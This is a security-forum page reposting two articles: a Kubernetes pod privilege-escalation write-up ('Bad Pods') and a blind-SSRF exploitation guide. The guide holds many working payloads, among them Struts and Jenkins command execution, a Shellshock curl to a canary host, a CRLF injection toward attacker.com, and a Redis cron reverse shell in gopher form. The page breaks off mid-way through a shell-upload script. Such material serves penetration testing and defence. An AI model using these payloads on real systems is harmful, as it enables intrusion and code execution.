Jump to content
  1. Informatii generale

    1. Anunturi importante

      Anunturile importante si regulile forumului. Cititi regulamentu​l inainte de a posta.

    2. Bine ai venit

      Bine ati venit pe forumul Romanian Security Team, aici va puteti prezenta (optional)

    3. Proiecte RST

      Aici veti putea gasi toate programele, tutorialele, metodele si exploiturile create de catre membrii RST

  2. Sectiunea tehnica

    1. Exploituri

      Cele mai noi exploituri, POC-uri sau shellcode-uri

    2. Challenges (CTF)

      Challenge-uri - Wargames, pentru amatorii CTF-urilor

    3. Bug Bounty

      Categorie destinata discutiilor referitoare la site-urile care au un program Bug Bounty in desfasurare prin care rasplatesc persoanele care le raporteaza vulnerabilitati

    4. Programare

      Coltul programatorilor: C/C++, Visual Basic, .NET, Java, ASM, Shell scripting, Perl, Python

    5. Securitate web

      Tutoriale si discutii legate de securitatea aplicatiilor web

    6. Reverse engineering & exploit development

      Tutoriale despre analiza malware, sample-uri, cod sursa, programe utile, reverse engineering si exploit development

    7. Mobile security

      Discutii despre telefoane mobile, root-ing, jailbreak-ing etc.

    8. Sisteme de operare si discutii hardware

      Discutii in materie hardware, windows, unix, bsd etc.

    9. Electronica

      Discutii generale despre electronica

    10. Wireless Pentesting

      Wardriving area, WiFi, Bluetooth si GSM hacking

    11. Black SEO & monetizare

      Tips & tricks, questions, monetizare

  3. Programe

    1. Programe hacking

      Postati aici utilitare cum ar fi sniffere, bruteforcers, fuzzers etc. Nu faceti cereri aici.

    2. Programe securitate

      Postati aici programe cum ar fi firewall-uri, antivirusi si programe similare

    3. Programe utile

      Programe ce nu se incadreaza in celelalte sectiuni: hack sau securitate

    4. Free stuff

      Diverse lucruri utile, fiind excluse root-uri, SMTP-uri, VPS-uri etc.

  4. Discutii generale

    1. RST Market

      Orice vanzare/cumparare care are legatura cu frauda online/bancara sau access neautorizat este penalizata cu ban permanent!  Minim 50 de posturi pentru acces!

    2. Off-topic

      Discutii pe diverse teme, discutii care nu se incadreaza la celalalte categorii. Doar discutii din domeniul IT!

    3. Discutii incepatori

      Daca esti incepator, ai o intrebare simpla sau vrei sa stii mai multe despre un domeniu, aici e sectiunea potrivita

    4. Stiri securitate

      Stiri din domeniul securitatii IT

    5. Linkuri

      Postati aici doar linkurile despre securitate!

    6. Cosul de gunoi

      Toate topicurile care au deviat de la raspuns vor fi mutate aici.

  • Topics

  • Posts

    • Bad Pods: Kubernetes Pod Privilege Escalation   Seth Art on Jan 19, 2021 5:26:38 AM What are the risks associated with overly permissive pod creation in Kubernetes? The answer varies based on which of the host’s namespaces and security contexts are allowed. In this post, I will describe eight insecure pod configurations and the corresponding methods to perform privilege escalation. This article and the accompanying repository were created to help penetration testers and administrators better understand common misconfiguration scenarios. If you are an administrator, I hope that this post gives you the confidence to apply restrictive controls around pod creation by default. I also hope it helps you consider isolating any pods that need access to the host’s resources to a namespace that is only accessible to administrators using the principle of least privilege. If you are a penetration tester, I hope this post provides you with some ideas on how to demonstrate the impact of an overly permissive pod security policy. And I hope that the repository gives you some easy-to-use manifests and actionable steps to achieve those goals. Executive Summary: One of the foundations of information security is the "principal of least privilege." This means that every user, system process, or application needs to operate using the least set of privileges required to do a task. When privileges are configured where they greatly exceed what is required, attackers can take advantage of these situations to access sensitive data, compromise systems, or escalate those privileges to conduct lateral movement in a network.   Kubernetes and other new "DevOps" technologies are complex to implement properly and are often deployed misconfigured or configured with more permissions than necessary. The lesson, as we have demonstrated from our "Bad Pods" research, is that if you are using Kubernetes in your infrastructure, you need to find out from your development team how they are configuring and hardening this environment.   HARDENING PODS: HOW RISKY CAN A SINGLE ATTRIBUTE BE? When it comes to Kubernetes security best practices, every checklist worth its salt mentions that you want to use the principle of least privilege when provisioning pods. But how can we enforce granular security controls and how do we evaluate the risk of each attribute? A Kubernetes administrator can enforce the principle of least privilege using admission controllers. For example, there’s a built-in Kubernetes controller called PodSecurityPolicy and also a popular third-party admission controller called OPA Gatekeeper. Admission controllers allow you to deny a pod entry into the cluster if it has more permissions than the policy allows. However, even though the controls exist to define and enforce policy, the real-world security implications of allowing each specific attribute is not always understood, and quite often, pod creation is not as locked down as it needs to be. As a penetration tester, you might find yourself with access to create pods on a cluster where there is no policy enforcement. This is what I like to refer to as “easy mode.” Use this manifest from Rory McCune (@raesene), this command from Duffie Cooley (@mauilion), or the node-shell krew plugin and you will have fully interactive privileged code execution on the underlying host. It doesn’t get easier than that! But what if you can create a pod with just, hostNetwork, hostPID, hostIPC, hostPath, or privileged? What can you do in each case? Let’s take a look!     BAD PODS - ATTRIBUTES AND THEIR WORST-CASE SECURITY IMPACT The pods below are loosely ordered from highest to lowest security impact. Note that the generic attack paths that could affect any Kubernetes pod (e.g., checking to see if the pod can access the cloud provider’s metadata service or identifying misconfigured Kubernetes RBAC) are covered in Bad Pod #8: Nothing allowed.   THE BAD PODS LINEUP Pods Bad Pod #1: Everything allowed Bad Pod #2: Privileged and hostPid Bad Pod #3: Privileged only Bad Pod #4: hostPath only Bad Pod #5: hostPid only Bad Pod #6: hostNetwork only Bad Pod #7: hostIPC only Bad Pod #8: Nothing allowed   BAD POD #1: EVERYTHING ALLOWED What’s the worst that can happen? Multiple paths to full cluster compromise How? The pod you create mounts the host’s filesystem to the pod. You’ll have the best luck if you can schedule your pod on a control-plane node using the nodeName selector in your manifest. You then exec into your pod and chroot to the directory where you mounted the host’s filesystem. You now have root on the node running your pod. Read secrets from etcd  — If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains the configuration for the cluster, including all secrets. Hunt for privileged service account tokens — Even if you can only schedule your pod on the worker node, you can also access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod that has a mounted token that is bound to a service account that is bound to a clusterrolebinding, which gives you access to do things like create pods or view secrets in all namespaces Some additional privilege escalation patterns are outlined in the README document linked below and also in Bad Pod #4: hostPath.   Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/everything-allowed References and further reading The Most Pointless Kubernetes Command Ever Secure Kubernetes - KubeCon NA 2019 CTF Deep Dive into Real-World Kubernetes Threats Compromising Kubernetes Cluster by Exploiting RBAC Permissions (slides) The Path Less Traveled: Abusing Kubernetes Defaults & Corresponding Repo BAD POD #2: PRIVILEGED AND HOSTPID What’s the worst that can happen? Multiple paths to full cluster compromise How? In this scenario, the only thing that changes from the everything-allowed pod is how you gain root access to the host. Rather than chrooting to the host’s filesystem, you can use nsenter to get a root shell on the node running your pod. Why does it work? Privileged — The privileged: true container-level security context breaks down almost all the walls that containers are supposed to provide; however, the PID namespace is one of the few walls that stands. Without hostPID, nsenter would only work to enter the namespaces of a process running within the container. For more examples on what you can do if you only have privileged: true, refer to the next example Bad Pod #3: Privileged Only. Privileged + hostPID — When both hostPID: true and privileged: true are set, the pod can see all of the processes on the host, and you can enter the init system (PID 1) on the host. From there, you can execute your shell on the node. Once you are root on the host, the privilege escalation paths are all the same as described in Bad Pod # 1: Everything-allowed. Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/priv-and-hostpid References and further reading Duffie Cooley's Nsenter Pod Tweet The Path Less Traveled: Abusing Kubernetes Defaults & Corresponding Repo Node-shell Krew Plugin BAD POD #3: PRIVILEGED ONLY What’s the worst that can happen? Multiple paths to full cluster compromise How? If you only have privileged: true, there are two paths you can take: Mount the host’s filesystem — In privileged mode, /dev on the host is accessible in your pod. You can mount the disk that contains the host’s filesystem into your pod using the mount command. In my experience, this gives you a limited view of the filesystem though. Some files, and therefore privesc paths, are not accessible from your privileged pod unless you escalate to a full shell on the node. That said, it is easy enough that you might as well mount the device and see what you can see. Exploit cgroup user mode helper programs — Your best bet is to get interactive root access on the node, but you must jump through a few hoops first. You can use Felix Wilhelm's exploit PoC undock.sh to execute one command a time, or you can use Brandon Edwards and Nick Freeman’s version from their talk A Compendium of Container Escapes, which forces the host to connect back to the listener on the pod for an easy upgrade to interactive root access on the host. Another option is to use the Metasploit module Docker Privileged Container Escape, which uses the same exploit to upgrade a shell received from a container to a shell on the host. Whichever option you choose, the Kubernetes privilege escalation paths are largely the same as the Bad Pod #1: Everything-allowed. Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/priv References and further reading Felix Wilhelm's Cgroup Usermode Helper Exploit Understanding Docker Container Escapes A Compendium of Container Escapes Docker Privileged Container Escape Metasploit Module   BAD POD #4: HOSTPATH ONLY What’s the worst that can happen? Multiple paths to full cluster compromise How? In this case, even if you don’t have access to the host’s process or network namespaces, if the administrators have not limited what you can mount, you can mount the entire host’s filesystem into your pod, giving you read/write access on the host’s filesystem. This allows you to execute most of the same privilege escalation paths outlined above. There are so many paths available that Ian Coldwater and Duffie Cooley gave an awesome Black Hat 2019 talk about it titled “The Path Less Traveled: Abusing Kubernetes Defaults!” Here are some privileged escalation paths that apply any time you have access to a Kubernetes node’s filesystem: Look for kubeconfig files on the host filesystem — If you are lucky, you will find a cluster-admin config with full access to everything. Access the tokens from all pods on the node — Use something like kubectl auth can-i --list or access-matrix to see if any of the pods have tokens that give you more permissions than you currently have. Look for tokens that have permissions to get secrets or create pods, deployments, etc., in kube-system, or that allow you to create clusterrolebindings. Add your SSH key — If you have network access to SSH to the node, you can add your public key to the node and SSH to it for full interactive access. Crack hashed passwords — Crack hashes in /etc/shadow; see if you can use them to access other nodes.   Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/hostpath References and further reading The Path Less Traveled: Abusing Kubernetes Defaults & Corresponding Repo Secure Kubernetes - KubeCon NA 2019 CTF Deep Dive into Real-World Kubernetes Threats Compromising Kubernetes Cluster by Exploiting RBAC Permissions (slides) BAD POD #5: HOSTPID ONLY What’s the worst that can happen? Application or cluster credential leaks if an application in the cluster is configured incorrectly. Denial of service via process termination. How? There’s no clear path to get root on the node with only hostPID, but there are still some good post-exploitation opportunities. View processes on the host — When you run ps from within a pod that has hostPID: true, you see all the processes running on the host, including processes running in each pod. Look for passwords, tokens, keys, etc. — If you are lucky, you will find credentials and you can then use them to escalate privileges in the cluster, to escalate privileges to services supported by the cluster, or to escalate privileges to services that communicate with cluster-hosted applications. It’s a long shot, but you might find a Kubernetes service account token or some other authentication material that will allow you to access other namespaces and eventually escalate all the way to cluster admin. Kill processes — You can also kill any process on the node (presenting a denial-of-service risk). Because of this risk though, I would advise against it on a penetration test! Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/hostpid   BAD POD #6: HOSTNETWORK ONLY What’s the worst that can happen? Potential path to cluster compromise How? If you only have hostNetwork: true, you can’t get privileged code execution on the host directly, but if you cross your fingers, you might still find a path to cluster admin. There are three potential escalation paths: Sniff traffic — You can use tcpdump to sniff unencrypted traffic on any interface on the host. You might get lucky and find service account tokens or other sensitive information that is transmitted over unencrypted channels. Access services bound to localhost — You can also reach services that only listen on the host’s loopback interface or that are otherwise blocked by network policies. These services might turn into a fruitful privilege escalation path. Bypass network policy — If a restrictive network policy is applied to the namespace, deploying a pod with hostNetwork: true allows you to bypass the restrictions. This works because you are bound to the host's network interfaces and not the pods. Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/hostnetwork   BAD POD #7: HOSTIPC ONLY What’s the worst that can happen? Ability to access data used by any pods that also use the host’s IPC namespace How? If any process on the host or any processes in a pod uses the host’s inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), you’ll be able to read/write to those same mechanisms. The first place you'll want to look is /dev/shm, as it is shared between any pod with hostIPC: true and the host. You'll also want to check out the other IPC mechanisms with ipcs. Inspect /dev/shm — Look for any files in this shared memory location. Inspect existing IPC facilities — You can check to see if any IPC facilities are being used with /usr/bin/ipcs. Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/hostipc   BAD POD #8: NOTHING ALLOWED   What’s the worst that can happen? Multiple potential paths to full cluster compromise How? To close our bad Pods lineup, there are plenty of attack paths that should be investigated any time you can create a pod or simply have access to a pod, even if there are no security attributes enabled. Here are some things to look for whenever you have access to a Kubernetes pod: Accessible cloud metadata — If the pod is cloud hosted, try to access the cloud metadata service. You might get access to the IAM credentials associated with the node or even just find a cloud IAM credential created specifically for that pod. In either case, this can be your path to escalate in the cluster, in the cloud environment, or in both. Overly permissive service accounts — If the namespace’s default service account is mounted to /var/run/secrets/kubernetes.io/serviceaccount/token in your pod and is overly permissive, use that token to further escalate your privileges within the cluster. Misconfigured Kubernetes components — If either the apiserver or the kubelets have anonymous-auth set to true and there are no network policy controls preventing it, you can interact with them directly without authentication. Kernel, container engine, or Kubernetes exploits — An unpatched exploit in the underlying kernel, in the container engine, or in Kubernetes can potentially allow a container escape or access to the Kubernetes cluster without any additional permissions. Hunt for vulnerable services — Your pod will likely see a different view of the network services running in the cluster than you can see from the machine you used to create the pod. You can hunt for vulnerable services and applications by proxying your traffic through the pod. Usage and exploitation examples https://github.com/BishopFox/badPods/tree/main/manifests/nothing-allowed References and further reading Secure Kubernetes - KubeCon NA 2019 CTF Kubernetes Goat Attacking Kubernetes through Kubelet Deep Dive into Real-World Kubernetes Threats A Compendium of Container Escapes CVE-2020-8558 POC CONCLUSION Apart from the Bad Pod #8: Nothing Allowed example, all of the privilege escalation paths covered in this blog post (and the respective repository) can be mitigated with restrictive pod security policies. Additionally, there are many other defense-in-depth security controls available to Kubernetes administrators that can reduce the impact of or completely thwart certain attack paths even when an attacker has access to some or all of the host namespaces and capabilities (e.g., disabling the automatic mounting of service account tokens or requiring all pods to run as non-root by enforcing MustRunAsNonRoot=true and allowPrivilegeEscalation=false). As is always the case with penetration testing, your mileage may vary. Administrators are sometimes hard pressed to defend security best practices without examples that demonstrate the security implications of risky configurations. I hope the examples laid out in this post and the manifests contained in the Bad Pods repository help you enforce the principle of least privilege when it comes to Kubernetes pod creation in your organization.   Sursa: https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation
    • Introduction What is Server Side Request Forgery (SSRF)? Server Side Request Forgery occurs when you can coerce a server to make arbitrary requests on your behalf. As the requests are being made by the server, it may be possible to access internal resources due to where the server is positioned in the network. On cloud environments, SSRF poses a more significant risk due to the presence of metadata endpoints that may contain sensitive credentials or secrets. Blind SSRF When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. In the industry, this behaviour is often referred to as "Blind SSRF". In such situations, how do we prove impact? This was an interesting discussion that was sparked by Justin Gardner on Twitter: If you can reach internal resources, there are a number of potential exploit chains that can be executed to prove impact. This blog post attempts to go into detail for each known exploit chain when leveraging blind SSRF, and will be updated as more techniques are discovered and shared. If we've missed any techniques, please send us a tweet or a DM: @assetnote and we'll add it to this blog. SSRF Canaries In order to validate that you can interact with internal services or applications, you can utilise "SSRF canaries". This is when we can request an internal URL that performs another SSRF and calls out to your canary host. If you receive a request to your canary host, it means that you have successfully hit an internal service that is also capable making outbound requests. This is an effective way to verify that an SSRF vulnerability has access to a internal networks or applications, and to also verify the presence of certain software existing on the internal network. You can also potentially pivot to more sensitive parts of an internal network using an SSRF canary, depending on where it sits. Using DNS datasources and AltDNS to find internal hosts With the goal being to find as many internal hosts as possible, DNS datasources can be utilised to find all records that point to internal hosts. On cloud environments, we often see ELBs that are pointing to hosts inside an internal VPC. Depending on which VPC the asset you're targeting is in, it may be possible to access other hosts within the same VPC. For example, consider the following host has been discovered from DNS datasources: livestats.target.com -> internal-es-livestats-298228113.us-west-2.elb.amazonaws.com -> You can make an assumption that the es stands for Elasticsearch, and then perform further attacks on this host. You can also spray all of these blind SSRF payloads across all of the "internal" hosts that have been identified through this method. This is often effective. To find more internal hosts, I recommend taking all of your DNS data and then using something like AltDNS to generate permutations and then resolve them with a fast DNS bruteforcer. Once this is complete, identify all of the newly discovered internal hosts and use them as a part of your blind SSRF chain. Side Channel Leaks When exploiting blind SSRF vulnerabilities, you may be able to leak some information about the response being returned. For example, let's say that you have blind SSRF via an XXE, the error messages may indicate whether or not: A response was returned Error parsing request: System.Xml.XmlException: Expected DTD markup was not found. Line 1, position 1. vs. Host and port are unreachable Error parsing request: System.Net.WebException: Unable to connect to the remote server Similarly, outside of XXEs, a web application could also have a side channel leak that can be ascertained by inspecting differences within the: Response status code: Online internal asset:port responds with 200 OK vs offline internal asset:port 500 Internal Server Error Response contents: The response size in bytes is smaller or bigger depending on whether or not the URL you are trying to request is reachable. Response timing: The response times are slower or faster depending on whether or not the URL you are trying to request is reachable. Techniques Possible via HTTP(s) Elasticsearch Weblogic Hashicorp Consul Shellshock Apache Druid Apache Solr PeopleSoft Apache Struts JBoss Confluence Jira Other Atlassian Products OpenTSDB Jenkins Hystrix Dashboard W3 Total Cache Docker Gitlab Prometheus Redis Exporter Possible via Gopher Redis Memcache Apache Tomcat Tools Gopherus SSRF Proxy Possible via HTTP(s)   Elasticsearch Commonly bound port: 9200 When Elasticsearch is deployed internally, it usually does not require authentication. If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200: /_cluster/health /_cat/indices /_cat/health If you have a blind SSRF where you can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following path: Note: the _shutdown API has been removed from Elasticsearch version 2.x. and up. This only works in Elasticsearch 1.6 and below: /_shutdown /_cluster/nodes/_master/_shutdown /_cluster/nodes/_shutdown /_cluster/nodes/_all/_shutdown   Weblogic Commonly bound ports: 80, 443 (SSL), 7001, 8888 SSRF Canary: UDDI Explorer (CVE-2014-4210) POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1 Host: target.com Content-Length: 137 Content-Type: application/x-www-form-urlencoded operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search This also works via GET: http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search This endpoint is also vulnerable to CRLF injection: GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0 Host: vuln.weblogic Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 Connection: close Will result in the following request: root@mail:~# nc -lvp 4000 Listening on [] (family 0, port 4000) Connection from example.com 43111 received! POST /exp HTTP/1.11 X-CLRF: Injected HTTP/1.1 Content-Type: text/xml; charset=UTF-8 soapAction: "" Content-Length: 418 User-Agent: Java1.6.0_24 Host: attacker.com:4000 Accept: text/html, image/gif, image/jpeg, */*; q=.2 Connection: Keep-Alive <?xml version="1.0" encoding="UTF-8" standalone="yes"?><env:Envelope xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><env:Header/><env:Body><find_business generic="2.0" xmlns="urn:uddi-org:api_v2"><name>sdf</name></find_business></env:Body></env:Envelope> SSRF Canary: CVE-2020-14883 Taken from here. Linux: POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: vulnerablehost:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 117 _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml") Windows: POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: vulnerablehost:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 117 _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")   Hashicorp Consul Commonly bound ports: 8500, 8501 (SSL) Writeup can be found here.   Shellshock Commonly bound ports: 80, 443 (SSL), 8080 In order to effectively test for Shellshock, you may need to add a header containing the payload. The following CGI paths are worth trying: Short list of CGI paths to test: Gist containing paths. SSRF Canary: Shellshock via User Agent User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY   Apache Druid Commonly bound ports: 80, 8080, 8888, 8082 See the API reference for Apache Druid here. If you can view the status code, check the following paths to see if they return a 200 status code: /status/selfDiscovered/status /druid/coordinator/v1/leader /druid/coordinator/v1/metadata/datasources /druid/indexer/v1/taskStatus Shutdown tasks, requires you to guess task IDs or the datasource name: /druid/indexer/v1/task/{taskId}/shutdown /druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks Shutdown supervisors on Apache Druid Overlords: /druid/indexer/v1/supervisor/terminateAll /druid/indexer/v1/supervisor/{supervisorId}/shutdown   Apache Solr Commonly bound port: 8983 SSRF Canary: Shards Parameter Taken from here. /search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}} /solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json /xxx?q=aaa%26shards=http://SSRF_CANARY/solr /xxx?q=aaa&shards=http://SSRF_CANARY/solr SSRF Canary: Solr XXE (2017) Apache Solr 7.0.1 XXE (Packetstorm) /solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'><a></a>' /xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'><a></a>"} RCE via dataImportHandler Research on RCE via dataImportHandler   PeopleSoft Commonly bound ports: 80,443 (SSL) Taken from this research here. SSRF Canary: XXE #1 POST /PSIGW/HttpListeningConnector HTTP/1.1 Host: website.com Content-Type: application/xml ... <?xml version="1.0"?> <!DOCTYPE IBRequest [ <!ENTITY x SYSTEM "http://SSRF_CANARY"> ]> <IBRequest> <ExternalOperationName>&x;</ExternalOperationName> <OperationType/> <From><RequestingNode/> <Password/> <OrigUser/> <OrigNode/> <OrigProcess/> <OrigTimeStamp/> </From> <To> <FinalDestination/> <DestinationNode/> <SubChannel/> </To> <ContentSections> <ContentSection> <NonRepudiation/> <MessageVersion/> <Data><![CDATA[<?xml version="1.0"?>your_message_content]]> </Data> </ContentSection> </ContentSections> </IBRequest> SSRF Canary: XXE #2 POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1 Host: website.com Content-Type: application/xml ... <!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">   Apache Struts Commonly bound ports: 80,443 (SSL),8080,8443 (SSL) Taken from here. SSRF Canary: Struts2-016: Append this to the end of every internal endpoint/URL you know of: ?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}   JBoss Commonly bound ports: 80,443 (SSL),8080,8443 (SSL) Taken from here. SSRF Canary: Deploy WAR from URL /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war   Confluence Commonly bound ports: 80,443 (SSL),8080,8443 (SSL) SSRF Canary: Sharelinks (Confluence versions released from 2016 November and older) /rest/sharelinks/1.0/link?url=https://SSRF_CANARY/ SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506) Atlassian Security Ticket OAUTH-344 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY   Jira Commonly bound ports: 80,443 (SSL),8080,8443 (SSL) SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506) Atlassian Security Ticket OAUTH-344 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451) Atlassian Security Ticket JRASERVER-69793 /plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com   Other Atlassian Products Commonly bound ports: 80,443 (SSL),8080,8443 (SSL) SSRF Canary: iconUriServlet (CVE-2017-9506): Bamboo < 6.0.0 Bitbucket < 4.14.4 Crowd < 2.11.2 Crucible < 4.3.2 Fisheye < 4.3.2 Atlassian Security Ticket OAUTH-344 /plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY   OpenTSDB Commonly bound port: 4242 OpenTSDB Remote Code Execution SSRF Canary: curl via RCE /q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png   Jenkins Commonly bound ports: 80,443 (SSL),8080,8888 Great writeup here. SSRF Canary: CVE-2018-1000600 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai RCE Follow the instructions here to achieve RCE via GET: Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE! /org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange; RCE via Groovy cmd = 'curl burp_collab' pay = 'public class x {public x(){"%s".execute()}}' % cmd data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)   Hystrix Dashboard Commonly bound ports: 80,443 (SSL),8080 Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6. SSRF Canary: CVE-2020-5412 /proxy.stream?origin=http://SSRF_CANARY/   W3 Total Cache Commonly bound ports: 80,443 (SSL) W3 Total Cache SSRF Canary: CVE-2019-6715 This needs to be a PUT request: PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 Host: {{Hostname}} Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Content-Length: 124 Content-Type: application/x-www-form-urlencoded Connection: close {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"} SSRF Canary The advisory for this vulnerability was released here: W3 Total Cache SSRF vulnerability This PHP code will generate a payload for your SSRF Canary host (replace url with your canary host): <?php $url='http://www.google.com'; $file=strtr(base64_encode(gzdeflate($url.'#https://ajax.googleapis.com')), '+/=', '-_'); $file=chop($file,'='); $req='/wp-content/plugins/w3-total-cache/pub/minify.php?file='.$file.'.css'; echo($req); ?> Docker Commonly bound ports: 2375, 2376 (SSL) If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker's API: /containers/json /secrets /services RCE via running an arbitrary docker image POST /containers/create?name=test HTTP/1.1 Host: website.com Content-Type: application/json ... {"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true} Replace alpine with an arbitrary image you would like the docker container to run. Gitlab Prometheus Redis Exporter Commonly bound ports: 9121 This vulnerability affects Gitlab instances before version 13.1.1. According to the Gitlab documentation Prometheus and its exporters are on by default, starting with GitLab 9.0. These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter. The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter: http://localhost:9121/scrape?target=redis://* Possible via Gopher   Redis Commonly bound port: 6379 Recommended reading: Trying to hack Redis via HTTP requests SSRF Exploits against Redis RCE via Cron - Gopher Attack Surfaces redis-cli -h $1 flushall echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/ 0>&1\n\n"|redis-cli -h $1 -x set 1 redis-cli -h $1 config set dir /var/spool/cron/ redis-cli -h $1 config set dbfilename root redis-cli -h $1 save Gopher: gopher://*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/ 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a RCE via Shell Upload (PHP) - Redis Getshell Summary #!/usr/bin/env python # -*-coding:utf-8-*- import urllib protocol="gopher://" ip="" port="6379" shell="\n\n<?php 